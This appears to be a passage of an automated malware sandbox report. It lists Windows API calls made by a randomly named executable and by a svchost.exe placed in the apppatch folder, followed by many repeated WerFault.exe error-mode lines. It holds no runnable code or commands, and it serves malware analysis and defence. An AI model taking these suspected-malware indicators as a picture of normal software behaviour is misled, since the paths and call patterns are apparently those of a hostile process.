Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0138BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0138BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0138BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0138BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 6_2_0138BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0138BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0321C380 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,10_2_0321C380
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0321C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,10_2_0321C069
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0321C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,10_2_0321C069
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_03218F20 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,10_2_03218F20
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0321BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,10_2_0321BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0321BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,10_2_0321BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0321BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,10_2_0321BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0321BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,10_2_0321BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 10_2_0321BDD0 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,10_2_0321BDD0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C844F0 GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02C844F0
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
